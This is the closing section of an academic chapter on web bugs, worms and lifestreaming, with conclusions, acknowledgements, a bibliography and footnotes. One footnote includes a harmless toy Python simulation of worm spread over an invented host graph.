Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland 2012). This has been usefully described by the Economist, who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying” (Economist 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol (Economist 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman 1997, Gelernter 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A ''lifestream'' is a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries (Freeman 2000). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was certainly one of the first people to collect their data systematically as he explains he started in 1989: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them (Wolfram 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
This way of collecting and sending data has been accelerated by the use of mobile ‘apps’, which are small relatively contained applications that usually perform a single specific function. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied (ActivityStreamsWG 2011, original emphasis).&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that enable the data transfers. Whilst also becoming the vectors that carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Harraway 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as “future self continuity” (Tugend 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Evenso, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
AP (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBSNews (2010)Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Chicago: Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp. 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lumapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) Chartbeat: http://static.chartbeat.com/js/chartbeat.js ; (2) Google Analytics: http://www.google-analytics.com/ga.js ; (3) Omniture: http://o.aolcdn.com/omniunih.js ; (4) Advertising.com: http://o.aolcdn.com/ads/adsWrapper.js &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
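&lt;br /&gt;
To make this notion of unaided self-propagation concrete, here is a minimal, deliberately abstract sketch in Python of how a worm-style payload spreads across a network graph without human action. The host names, the reachable_from topology and the is_vulnerable check are hypothetical illustrations, not any actual worm's mechanism: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A toy simulation of worm-style propagation across a network.
# Hosts, topology and the vulnerability test are invented for illustration.
from collections import deque

reachable_from = {
    'host-a': ['host-b', 'host-c'],
    'host-b': ['host-d'],
    'host-c': ['host-d', 'host-e'],
    'host-d': [],
    'host-e': ['host-a'],
}

def is_vulnerable(host):
    # Stand-in for an exploitable file- or network-transport feature.
    return host != 'host-d'   # assume one host is patched

def propagate(start):
    infected = set()
    frontier = deque([start])
    while frontier:
        host = frontier.popleft()
        if host in infected or not is_vulnerable(host):
            continue
        infected.add(host)                      # the payload runs here
        frontier.extend(reachable_from[host])   # copies itself onward, unaided
    return infected

print(sorted(propagate('host-a')))
# ['host-a', 'host-b', 'host-c', 'host-e']  (the patched host resists)
&amp;lt;/pre&amp;gt; &lt;br /&gt;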
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad: careful analysis of images accidentally captured in the background of photographs of computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enrichment process (see http://www.president.ir/en/9172 and Peterson 2012). &lt;br /&gt;
&lt;br /&gt;
